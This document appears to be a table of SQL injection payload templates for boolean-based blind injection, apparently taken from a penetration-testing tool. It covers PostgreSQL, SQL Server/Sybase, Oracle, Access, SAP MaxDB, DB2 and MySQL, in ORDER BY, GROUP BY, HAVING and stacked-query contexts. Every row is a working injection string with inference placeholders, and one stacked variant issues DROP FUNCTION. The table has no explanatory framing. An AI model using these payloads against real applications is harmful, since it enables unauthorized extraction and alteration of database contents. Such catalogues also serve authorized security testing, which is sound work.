| PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause | 1 | 2 | 1 | 2,3 | 1 | ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) | | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END)) | PostgreSQL |
| PostgreSQL boolean-based blind - ORDER BY clause (original value) | 1 | 4 | 1 | 3 | 1 | ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) | | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) | PostgreSQL |
| PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES) | 1 | 5 | 1 | 3 | 1 | ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) | ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) | | ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) | PostgreSQL |
| Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause | 1 | 3 | 1 | 3 | 1 | ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) | | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) | Microsoft SQL Server, Sybase |
| Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value) | 1 | 4 | 1 | 3 | 1 | ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) | | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) | Microsoft SQL Server, Sybase |
| Oracle boolean-based blind - ORDER BY, GROUP BY clause | 1 | 3 | 1 | 2,3 | 1 | ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) | | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) | Oracle |
| Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value) | 1 | 4 | 1 | 2,3 | 1 | ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) | | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) | Oracle |
| Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause | 1 | 4 | 1 | 2,3 | 1 | ,IIF([INFERENCE],1,1/0) | ,IIF([RANDNUM]=[RANDNUM],1,1/0) | | ,IIF([RANDNUM]=[RANDNUM1],1,1/0) | Microsoft Access |
| Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value) | 1 | 5 | 1 | 2,3 | 1 | ,IIF([INFERENCE],[ORIGVALUE],1/0) | ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) | | ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0) | Microsoft Access |
| SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause | 1 | 4 | 1 | 2,3 | 1 | ,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END) | ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END) | | ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END) | SAP MaxDB |
| SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value) | 1 | 5 | 1 | 2,3 | 1 | ,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) | ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) | | ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END) | SAP MaxDB |
| IBM DB2 boolean-based blind - ORDER BY clause | 1 | 4 | 1 | 3 | 1 | ,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) | ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) | | ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) | IBM DB2 |
| IBM DB2 boolean-based blind - ORDER BY clause (original value) | 1 | 5 | 1 | 3 | 1 | ,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) | ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) | | ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) | IBM DB2 |
| HAVING boolean-based blind - WHERE, GROUP BY clause | 1 | 3 | 1 | 1,2 | 1 | HAVING [INFERENCE] | HAVING [RANDNUM]=[RANDNUM] | | HAVING [RANDNUM]=[RANDNUM1] | |
| MySQL >= 5.0 boolean-based blind - Stacked queries | 1 | 4 | 1 | 1-8 | 1 | ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) | ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) | # | ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) | MySQL >= 5.0 |
| MySQL < 5.0 boolean-based blind - Stacked queries | 1 | 5 | 1 | 1-8 | 1 | ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) | ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) | # | ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) | MySQL < 5.0 |
| PostgreSQL boolean-based blind - Stacked queries | 1 | 3 | 1 | 1-8 | 1 | ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) | ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) | -- | ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) | PostgreSQL |
| PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES) | 1 | 5 | 1 | 1-8 | 1 | ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1 | ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1 | -- | ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1 | PostgreSQL |
| Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) | 1 | 3 | 1 | 1-8 | 1 | ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] | ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] | -- | ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] | Microsoft SQL Server, Sybase |
| Microsoft SQL Server/Sybase boolean-based blind - Stacked queries | 1 | 4 | 1 | 1-8 | 1 | ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) | ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) | -- | ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) | Microsoft SQL Server, Sybase |
| Oracle boolean-based blind - Stacked queries | 1 | 4 | 1 | 1-8 | 1 | ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL | ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL | -- | ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL | Oracle |
| Microsoft Access boolean-based blind - Stacked queries | 1 | 5 | 1 | 1-8 | 1 | ;IIF([INFERENCE],1,1/0) | ;IIF([RANDNUM]=[RANDNUM],1,1/0) | %16 | ;IIF([RANDNUM]=[RANDNUM1],1,1/0) | Microsoft Access |
| SAP MaxDB boolean-based blind - Stacked queries | 1 | 5 | 1 | 1-8 | 1 | ;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END | ;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END | -- | ;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END | SAP MaxDB |

2 participants